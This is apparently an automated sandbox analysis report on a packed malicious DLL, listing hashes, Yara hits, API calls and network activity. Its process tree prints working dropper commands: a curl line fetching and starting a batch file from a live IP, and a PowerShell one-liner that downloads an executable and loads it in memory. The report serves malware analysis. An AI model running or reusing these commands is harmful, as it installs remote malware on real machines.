Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Jan. 23, 2025, 6:26 a.m.	Jan. 23, 2025, 6:35 a.m.

Size	80.0KB
Type	PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5	`07fd51e1e8368144ea403137a671b84c`
SHA256	`b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f`
CRC32	`95218EF7`
ssdeep	`1536:Y2ShYtT4To+GdOfoPXRr9tXLtAuQeSVdJssWdcd7IW3+ZR+ueK:Y2z0To+GdlhrbwJJ7IW3+n+ue`
PDB Path	C:\Users\Administrator\source\repos\Project10\Release\Project10.pdb
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsDLL - (no description) DllRegisterServer_Zero - execute regsvr32.exe IsPE32 - (no description) Generic_Malware_Zero - Generic Malware UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check

rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\iviewers.dll,DllRegisterServer
2084
- cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat & start AppS.bat
  2272
  - curl.exe curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat
    2360
  - cmd.exe C:\Windows\system32\cmd.exe /K AppS.bat
    2424
    - powershell.exe powershell -Command "$url = 'http://147.45.44.131/infopage/ioubcs.exe'; $webClient = New-Object System.Net.WebClient; $headerName = 'X-Special-Header'; $headerValue = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'; $webClient.Headers.Add($headerName, $headerValue); $fileBytes = $webClient.DownloadData($url); $assembly = [System.Reflection.Assembly]::Load($fileBytes); $entryPoint = $assembly.EntryPoint; if ($entryPoint -ne $null) { $entryPoint.Invoke($null, @()); }"
      2516
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\iviewers.dll,
2196

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
147.45.44.131	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW Jan. 22, 2025, 1:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 22, 2025, 1:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 22, 2025, 1:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 22, 2025, 1:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 22, 2025, 1:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 22, 2025, 1:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 22, 2025, 1:46 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Jan. 22, 2025, 1:46 p.m.			0	0
IsDebuggerPresent Jan. 22, 2025, 1:46 p.m.			0	0

Command line console output was observed (15 events)

Time & API	Arguments	Status	Return
WriteConsoleW Jan. 22, 2025, 1:46 p.m.	buffer: C:\Windows\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Jan. 22, 2025, 1:46 p.m.	buffer: Exception calling "Load" with "1" argument(s): "Could not load file or assembly console_handle: 0x00000023	1	1
WriteConsoleW Jan. 22, 2025, 1:46 p.m.	buffer: '35328 bytes loaded from System.Management.Automation, Version=1.0.0.0, Cultur console_handle: 0x0000002f	1	1
WriteConsoleW Jan. 22, 2025, 1:46 p.m.	buffer: e=neutral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. An atte console_handle: 0x0000003b	1	1
WriteConsoleW Jan. 22, 2025, 1:46 p.m.	buffer: mpt was made to load a program with an incorrect format." console_handle: 0x00000047	1	1
WriteConsoleW Jan. 22, 2025, 1:46 p.m.	buffer: At line:1 char:372 console_handle: 0x00000053	1	1
WriteConsoleW Jan. 22, 2025, 1:46 p.m.	buffer: + $url = 'http://147.45.44.131/infopage/ioubcs.exe'; $webClient = New-Object Sy console_handle: 0x0000005f	1	1
WriteConsoleW Jan. 22, 2025, 1:46 p.m.	buffer: stem.Net.WebClient; $headerName = 'X-Special-Header'; $headerValue = 'qInx8F3tu console_handle: 0x0000006b	1	1
WriteConsoleW Jan. 22, 2025, 1:46 p.m.	buffer: JDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'; $webC console_handle: 0x00000077	1	1
WriteConsoleW Jan. 22, 2025, 1:46 p.m.	buffer: lient.Headers.Add($headerName, $headerValue); $fileBytes = $webClient.DownloadD console_handle: 0x00000083	1	1
WriteConsoleW Jan. 22, 2025, 1:46 p.m.	buffer: ata($url); $assembly = [System.Reflection.Assembly]::Load <<<< ($fileBytes); $e console_handle: 0x0000008f	1	1
WriteConsoleW Jan. 22, 2025, 1:46 p.m.	buffer: ntryPoint = $assembly.EntryPoint; if ($entryPoint -ne $null) { $entryPoint.Invo console_handle: 0x0000009b	1	1
WriteConsoleW Jan. 22, 2025, 1:46 p.m.	buffer: ke($null, @()); } console_handle: 0x000000a7	1	1
WriteConsoleW Jan. 22, 2025, 1:46 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000b3	1	1
WriteConsoleW Jan. 22, 2025, 1:46 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000000bf	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd0a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd120 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd120 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd120 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd9a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd9a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd9a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd9a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd9a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd9a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd120 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd120 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd120 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cda60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd2e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd2e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd2e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd2e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd2e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd2e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd2e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd2e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd2e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd2e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd2e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd2e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd2e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd2e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd620 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd620 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 22, 2025, 1:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006cd060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

C:\Users\Administrator\source\repos\Project10\Release\Project10.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Jan. 22, 2025, 1:46 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	Connection to IP address				suspicious_request	GET http://147.45.44.131/infopage/vsgqwn1qxS.bat
suspicious_features	GET method with no useragent header, Connection to IP address				suspicious_request	GET http://147.45.44.131/infopage/ioubcs.exe

Performs some HTTP requests (2 events)

request	GET http://147.45.44.131/infopage/vsgqwn1qxS.bat
request	GET http://147.45.44.131/infopage/ioubcs.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 158 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2084 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x744ed000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2084 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74470000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2084 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74501000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2084 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76bd1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2084 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x756f1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2084 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74fe1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02770000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02840000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02492000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02841000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02842000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02517000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02502000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02515000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02820000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02503000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02504000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02505000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02506000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02507000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02508000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02509000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02880000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02881000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02882000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02883000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02884000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02885000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02886000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02887000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02888000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02889000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
